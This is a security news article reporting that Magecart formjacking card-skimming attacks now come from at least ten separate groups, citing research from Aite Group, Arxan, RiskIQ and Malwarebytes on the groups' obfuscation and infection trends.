Magecart can no longer be considered the work of a single cybercrime group, but rather, an e-commerce security threat category in its own right

When Magecart first appeared on the scene with the breach of payment websites belonging to household names including British Airways, Ticketmaster, Sotheby’s, Newegg, and Cathay Pacific, many believed it was the work of a single group with a predilection for credit card skimmers.

In a technique known as ‘formjacking’, Magecart attackers exploit vulnerabilities in websites using e-commerce backend systems including Magento to inject checkouts with malicious code that skims and steals payment card data.

This information is then whisked away to a command and control (C2) server, where it may be moved on and sold in underground markets or used to conduct fraudulent transactions online.

Symantec says that more than 4,800 websites are compromised through formjacking every month. One-third of all detections occur during the holiday shopping season.

With high-profile enterprise companies becoming lucrative sources for stolen data, cybercriminals want to cash in – and the Magecart technique is proving popular.

According to a new report released today (August 28) by Aite Group and Arxan, Magecart should now be considered an umbrella term, under which many different groups are operating.

RiskIQ and Flashpoint said in November that at least seven groups were in operation, which later rose to nine. It is now believed that at least 10 Magecart entities are involved in financial data theft.

“Magecart has gone from relative obscurity to dominating national headlines and ascending to the top of the e-commerce industry’s most-wanted list,” Aite says.

“While it originated back in 2015 as the name of a group installing skimmers on e-commerce sites, it’s now being used for anonymity by multiple groups that use the same tactics but different techniques.”


YOU MAY ALSO LIKE GandCrab closure will lead to ‘power vacuum’ in ransomware market


Aite Group used a source code search engine to scour the web for JavaScript indicators of compromise in e-commerce websites. In total, 80 new victim organizations have been discovered worldwide.

Infected servers were sending skimmed card details to cyberattacks and, in some cases, more than one group had managed to compromise the same website.

The increase in formjacking has resulted in some Magecart groups evolving their tactics beyond basic, vulnerability-based infection.

Malicious JavaScript code is now being obfuscated through Base64, XML, or Hex encoding. Code signing is also coming into play, and some threat groups now time their attacks to prevent discovery until it is too late.

Magecart credit card skimmers have also recently been found in Amazon S3 buckets leading to the compromise of thousands of websites through so-called ‘spray and pray’ tactics, and in a recent case documented by Malwarebytes, the Poker Tracker software suite's website was running a vulnerable, outdated version of Drupal targeted by Magecart.

This may indicate that attackers using the Magecart technique are expanding beyond Magento to include other e-commerce systems.

Speaking to The Daily Swig, Jérôme Segura, director of threat intelligence at Malwarebytes, said that we should expect Magecart to encompass more techniques to both attack and avoid detection in the future.

“We should remember that web skimmers have existed for a long time and that the client-side artifacts we see these days could be replaced by server-side operations,” Segura says.

“For now, there are many JavaScript skimming kits available and this seems to be what threat actors are most comfortable to go with. It’s also opened the playing field to more criminals who might not have had previous experience with e-commerce platforms.”


RELATED Criminal turf war may be brewing after Magecart double whammy